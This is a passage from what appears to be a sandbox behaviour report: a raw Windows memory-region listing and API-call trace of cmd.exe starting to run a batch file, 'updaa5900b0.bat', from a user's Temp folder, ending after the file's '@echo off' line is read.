"\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1712 start_va = 0x756e0000 end_va = 0x7577ffff entry_point = 0x756e0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1713 start_va = 0x75780000 end_va = 0x75789fff entry_point = 0x75780000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1714 start_va = 0x75790000 end_va = 0x7588ffff entry_point = 0x75790000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1715 start_va = 0x76d80000 end_va = 0x76e6ffff entry_point = 0x76d80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1716 start_va = 0x4c0000 end_va = 0x647fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 1717 start_va = 0x74e30000 end_va = 0x74e8ffff entry_point = 0x74e30000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1718 start_va = 0x75b00000 end_va = 0x75bcbfff entry_point = 0x75b00000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1719 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1720 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1721 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1722 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1723 start_va = 0x790000 end_va = 0x910fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 1724 start_va = 0x920000 end_va = 0x1d1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Region: id = 1725 start_va = 0x1d20000 end_va = 0x2062fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d20000" filename = "" Region: id = 1726 start_va = 0x210000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Thread: id = 110 os_tid = 0x7fc [0094.023] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efc94 | out: lpSystemTimeAsFileTime=0x1efc94*(dwLowDateTime=0x3c006b50, dwHighDateTime=0x1d38a44)) [0094.023] GetCurrentProcessId () returned 0x7f0 [0094.023] GetCurrentThreadId () returned 0x7fc [0094.023] GetTickCount () returned 0x26306 [0094.023] QueryPerformanceCounter (in: lpPerformanceCount=0x1efc8c | out: lpPerformanceCount=0x1efc8c*=590859643) returned 1 [0094.025] GetModuleHandleA (lpModuleName=0x0) returned 0x49fa0000 [0094.025] __set_app_type (_Type=0x1) [0094.025] __p__fmode () returned 0x753431f4 [0094.025] __p__commode () returned 0x753431fc [0094.025] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fc21a6) returned 0x0 [0094.025] __getmainargs (in: _Argc=0x49fc4238, _Argv=0x49fc4240, _Env=0x49fc423c, _DoWildCard=0, _StartInfo=0x49fc4140 | out: _Argc=0x49fc4238, _Argv=0x49fc4240, _Env=0x49fc423c) returned 0 [0094.026] GetCurrentThreadId () returned 0x7fc [0094.026] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7fc) returned 0x60 [0094.026] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x759f0000 [0094.026] GetProcAddress (hModule=0x759f0000, lpProcName="SetThreadUILanguage") returned 0x75a1a84f [0094.026] SetThreadUILanguage (LangId=0x0) returned 0x409 [0094.026] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0094.026] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efc24 | out: phkResult=0x1efc24*=0x0) returned 0x2 [0094.026] VirtualQuery (in: lpAddress=0x1efc5b, lpBuffer=0x1efbf4, dwLength=0x1c | out: lpBuffer=0x1efbf4*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0094.026] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efbf4, dwLength=0x1c | out: lpBuffer=0x1efbf4*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0094.026] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efbf4, dwLength=0x1c | out: lpBuffer=0x1efbf4*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0094.027] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efbf4, dwLength=0x1c | out: lpBuffer=0x1efbf4*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0094.027] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efbf4, dwLength=0x1c | out: lpBuffer=0x1efbf4*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0094.027] GetConsoleOutputCP () returned 0x1b5 [0094.027] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fc4260 | out: lpCPInfo=0x49fc4260) returned 1 [0094.027] SetConsoleCtrlHandler (HandlerRoutine=0x49fbe72a, Add=1) returned 1 [0094.027] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.027] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0094.027] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.027] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fc41ac | out: lpMode=0x49fc41ac) returned 1 [0094.027] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.027] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0094.027] _get_osfhandle (_FileHandle=0) returned 0x3 [0094.027] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fc41b0 | out: lpMode=0x49fc41b0) returned 1 [0094.028] _get_osfhandle (_FileHandle=0) returned 0x3 [0094.028] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0094.028] GetEnvironmentStringsW () returned 0x6a22e8* [0094.028] FreeEnvironmentStringsW (penv=0x6a22e8) returned 1 [0094.028] GetEnvironmentStringsW () returned 0x6a22e8* [0094.028] FreeEnvironmentStringsW (penv=0x6a22e8) returned 1 [0094.028] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eeb94 | out: phkResult=0x1eeb94*=0x68) returned 0x0 [0094.028] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eeb9c, lpData=0x1eeba0, lpcbData=0x1eeb98*=0x1000 | out: lpType=0x1eeb9c*=0x0, lpData=0x1eeba0*=0x0, lpcbData=0x1eeb98*=0x1000) returned 0x2 [0094.029] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eeb9c, lpData=0x1eeba0, lpcbData=0x1eeb98*=0x1000 | out: lpType=0x1eeb9c*=0x4, lpData=0x1eeba0*=0x1, lpcbData=0x1eeb98*=0x4) returned 0x0 [0094.029] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eeb9c, lpData=0x1eeba0, lpcbData=0x1eeb98*=0x1000 | out: lpType=0x1eeb9c*=0x0, lpData=0x1eeba0*=0x1, lpcbData=0x1eeb98*=0x1000) returned 0x2 [0094.029] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eeb9c, lpData=0x1eeba0, lpcbData=0x1eeb98*=0x1000 | out: lpType=0x1eeb9c*=0x4, lpData=0x1eeba0*=0x0, lpcbData=0x1eeb98*=0x4) returned 0x0 [0094.029] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eeb9c, lpData=0x1eeba0, lpcbData=0x1eeb98*=0x1000 | out: lpType=0x1eeb9c*=0x4, lpData=0x1eeba0*=0x40, lpcbData=0x1eeb98*=0x4) returned 0x0 [0094.029] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eeb9c, lpData=0x1eeba0, lpcbData=0x1eeb98*=0x1000 | out: lpType=0x1eeb9c*=0x4, lpData=0x1eeba0*=0x40, lpcbData=0x1eeb98*=0x4) returned 0x0 [0094.029] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eeb9c, lpData=0x1eeba0, lpcbData=0x1eeb98*=0x1000 | out: lpType=0x1eeb9c*=0x0, lpData=0x1eeba0*=0x40, lpcbData=0x1eeb98*=0x1000) returned 0x2 [0094.029] RegCloseKey (hKey=0x68) returned 0x0 [0094.029] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eeb94 | out: phkResult=0x1eeb94*=0x68) returned 0x0 [0094.029] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eeb9c, lpData=0x1eeba0, lpcbData=0x1eeb98*=0x1000 | out: lpType=0x1eeb9c*=0x0, lpData=0x1eeba0*=0x40, lpcbData=0x1eeb98*=0x1000) returned 0x2 [0094.029] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eeb9c, lpData=0x1eeba0, lpcbData=0x1eeb98*=0x1000 | out: lpType=0x1eeb9c*=0x4, lpData=0x1eeba0*=0x1, lpcbData=0x1eeb98*=0x4) returned 0x0 [0094.029] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eeb9c, lpData=0x1eeba0, lpcbData=0x1eeb98*=0x1000 | out: lpType=0x1eeb9c*=0x0, lpData=0x1eeba0*=0x1, lpcbData=0x1eeb98*=0x1000) returned 0x2 [0094.029] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eeb9c, lpData=0x1eeba0, lpcbData=0x1eeb98*=0x1000 | out: lpType=0x1eeb9c*=0x4, lpData=0x1eeba0*=0x0, lpcbData=0x1eeb98*=0x4) returned 0x0 [0094.029] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eeb9c, lpData=0x1eeba0, lpcbData=0x1eeb98*=0x1000 | out: lpType=0x1eeb9c*=0x4, lpData=0x1eeba0*=0x9, lpcbData=0x1eeb98*=0x4) returned 0x0 [0094.029] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eeb9c, lpData=0x1eeba0, lpcbData=0x1eeb98*=0x1000 | out: lpType=0x1eeb9c*=0x4, lpData=0x1eeba0*=0x9, lpcbData=0x1eeb98*=0x4) returned 0x0 [0094.029] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eeb9c, lpData=0x1eeba0, lpcbData=0x1eeb98*=0x1000 | out: lpType=0x1eeb9c*=0x0, lpData=0x1eeba0*=0x9, lpcbData=0x1eeb98*=0x1000) returned 0x2 [0094.029] RegCloseKey (hKey=0x68) returned 0x0 [0094.029] time (in: timer=0x0 | out: timer=0x0) returned 0x5a56610b [0094.029] srand (_Seed=0x5a56610b) [0094.029] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /c \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat\"" [0094.029] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /c \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat\"" [0094.029] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fc5260 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0094.030] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6a45e8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0094.030] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91 [0094.030] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0094.030] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0094.030] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.030] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0094.030] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0094.030] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0094.030] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0094.030] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0094.030] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0094.030] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0094.030] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0094.030] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0094.030] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef960 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0094.030] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef960, lpFilePart=0x1ef95c | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x1ef95c*="Desktop") returned 0x19 [0094.030] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop")) returned 0x11 [0094.030] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef6dc | out: lpFindFileData=0x1ef6dc) returned 0x6a47f8 [0094.031] FindClose (in: hFindFile=0x6a47f8 | out: hFindFile=0x6a47f8) returned 1 [0094.031] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz", lpFindFileData=0x1ef6dc | out: lpFindFileData=0x1ef6dc) returned 0x6a2ae8 [0094.031] FindClose (in: hFindFile=0x6a2ae8 | out: hFindFile=0x6a2ae8) returned 1 [0094.031] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", lpFindFileData=0x1ef6dc | out: lpFindFileData=0x1ef6dc) returned 0x6a2ae8 [0094.031] FindClose (in: hFindFile=0x6a2ae8 | out: hFindFile=0x6a2ae8) returned 1 [0094.031] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop")) returned 0x11 [0094.031] SetCurrentDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop")) returned 1 [0094.031] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\aETAdzjz\\Desktop") returned 1 [0094.031] GetEnvironmentStringsW () returned 0x6a2ae8* [0094.031] FreeEnvironmentStringsW (penv=0x6a2ae8) returned 1 [0094.031] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fc5260 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0094.032] GetConsoleOutputCP () returned 0x1b5 [0094.033] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fc4260 | out: lpCPInfo=0x49fc4260) returned 1 [0094.033] GetUserDefaultLCID () returned 0x409 [0094.033] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fc4950, cchData=8 | out: lpLCData=":") returned 2 [0094.033] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1efaa0, cchData=128 | out: lpLCData="0") returned 2 [0094.033] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1efaa0, cchData=128 | out: lpLCData="0") returned 2 [0094.033] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1efaa0, cchData=128 | out: lpLCData="1") returned 2 [0094.033] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fc4940, cchData=8 | out: lpLCData="/") returned 2 [0094.033] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0094.033] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0094.033] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0094.033] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0094.033] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0094.033] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0094.033] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0094.033] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fc4930, cchData=8 | out: lpLCData=".") returned 2 [0094.033] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fc4920, cchData=8 | out: lpLCData=",") returned 2 [0094.033] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0094.034] GetConsoleTitleW (in: lpConsoleTitle=0x6a2b70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.034] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x759f0000 [0094.034] GetProcAddress (hModule=0x759f0000, lpProcName="CopyFileExW") returned 0x75a23b92 [0094.034] GetProcAddress (hModule=0x759f0000, lpProcName="IsDebuggerPresent") returned 0x75a04a5d [0094.034] GetProcAddress (hModule=0x759f0000, lpProcName="SetConsoleInputExeNameW") returned 0x75a1a79d [0094.037] _wcsicmp (_String1="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat", _String2=")") returned 58 [0094.037] _wcsicmp (_String1="FOR", _String2="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat") returned 3 [0094.037] _wcsicmp (_String1="FOR/?", _String2="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat") returned 3 [0094.037] _wcsicmp (_String1="IF", _String2="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat") returned 6 [0094.037] _wcsicmp (_String1="IF/?", _String2="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat") returned 6 [0094.037] _wcsicmp (_String1="REM", _String2="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat") returned 15 [0094.037] _wcsicmp (_String1="REM/?", _String2="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat") returned 15 [0094.037] GetConsoleTitleW (in: lpConsoleTitle=0x1ef798, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.037] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0094.037] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0094.037] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ef554, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1ef54c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ef54c*=0x705ba84c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0094.038] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0094.038] SetErrorMode (uMode=0x0) returned 0x0 [0094.038] SetErrorMode (uMode=0x1) returned 0x0 [0094.038] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\.", nBufferLength=0x208, lpBuffer=0x6a3008, lpFilePart=0x1ef2b8 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp", lpFilePart=0x1ef2b8*="Temp") returned 0x24 [0094.038] SetErrorMode (uMode=0x0) returned 0x1 [0094.038] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\.") returned 1 [0094.038] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0094.041] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0094.041] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat", fInfoLevelId=0x1, lpFindFileData=0x1ef054, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef054) returned 0x6a31c0 [0094.041] FindClose (in: hFindFile=0x6a31c0 | out: hFindFile=0x6a31c0) returned 1 [0094.041] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0094.041] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0094.041] GetConsoleTitleW (in: lpConsoleTitle=0x1ef52c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.042] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x756e0000 [0094.042] GetProcAddress (hModule=0x756e0000, lpProcName="SaferIdentifyLevel") returned 0x75702102 [0094.042] IdentifyCodeAuthzLevelW () returned 0x1 [0094.048] GetProcAddress (hModule=0x756e0000, lpProcName="SaferComputeTokenFromLevel") returned 0x75703352 [0094.048] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0094.048] GetProcAddress (hModule=0x756e0000, lpProcName="SaferCloseLevel") returned 0x75703825 [0094.048] CloseCodeAuthzLevel () returned 0x1 [0094.048] SetErrorMode (uMode=0x0) returned 0x0 [0094.048] SetErrorMode (uMode=0x1) returned 0x0 [0094.048] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat", nBufferLength=0x104, lpBuffer=0x6a2df0, lpFilePart=0x1ef418 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat", lpFilePart=0x1ef418*="updaa5900b0.bat") returned 0x34 [0094.048] SetErrorMode (uMode=0x0) returned 0x1 [0094.049] CmdBatNotification () returned 0x6a2e56 [0094.049] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\updaa5900b0.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef45c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0094.049] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0094.049] _get_osfhandle (_FileHandle=3) returned 0x78 [0094.049] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.049] _get_osfhandle (_FileHandle=3) returned 0x78 [0094.049] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.049] ReadFile (in: hFile=0x78, lpBuffer=0x49fc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef440, lpOverlapped=0x0 | out: lpBuffer=0x49fc6640*, lpNumberOfBytesRead=0x1ef440*=0xc8, lpOverlapped=0x0) returned 1 [0094.049] SetFilePointer (in: hFile=0x78, lDistanceToMove=11, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0094.050] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49fc6640, cbMultiByte=11, lpWideCharStr=0x49fcc640, cchWideChar=8191 | out: lpWideCharStr="@echo off\r\n") returned 11 [0094.050] _get_osfhandle (_FileHandle=3) returned 0x78 [0094.050] GetFileType (hFile=0x78) returned 0x1 [0094.050] _get_osfhandle (_FileHandle=3) returned 0x78 [0094.050] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0094.050] _wcsicmp (_String1="echo", _String2=")") returned 60 [0094.050] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0094.050] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0094.050] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0094.050] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0094.050] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0094.050] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0094.051] _tell (_FileHandle=3) returned 11 [0094.051] _close (_FileHandle=3) returned 0 [0094.051] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0094.051] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0094.051] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0094.051] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0094.051] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0094.051] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0094.051] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0094.051] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0094.051] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0094.051] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0094.051] GetConsoleTitleW (in: lpConsoleTitle=0x1ef024, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.052] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0094.052] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0094.052] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0094.052] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0094.052] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0094.052] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0094.052] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0094.052] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0094.052] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0094.052] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0094.052] _wcsnicmp (_String1="off", _String2="off", _MaxCount=0x3) returned 0 [0094.052] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.052] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0094.052] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.052] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fc41ac | out: lpMode=0x49fc41ac) returned 1 [0094.052] _get_osfhandle (_FileHandle=0) returned 0x3 [0094.052] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fc41b0 | out: lpMode=0x49fc41b0) returned 1 